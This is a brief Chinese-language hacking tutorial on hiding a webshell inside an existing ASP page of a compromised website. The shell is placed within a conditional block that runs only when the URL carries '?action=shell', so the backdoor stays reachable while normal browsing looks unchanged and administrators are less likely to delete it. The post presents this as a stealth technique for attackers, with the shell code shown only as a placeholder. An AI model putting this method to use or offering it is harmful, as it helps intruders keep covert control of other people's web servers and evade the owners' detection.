得到网站的webshell后,如果被管理员发现,那么你的马就没用了 ,被删了!
所以我们要隐藏好我们的SHELL
下面教一种很菜的方法,ASP插入法,不容易被发现~
在我们要做手脚的ASP文件里加入如下内容
<% if request("action")="shell" then %>
****************************
<% end if %>
在***********处加入你的shell代码
就哦克了
访问的时候在你做了手脚的ASP文件后面加上?action=shell(例如:index.asp?action=shell)
就可以调出webshell了,不影响正常浏览~
(出处:http://www.sheup.com)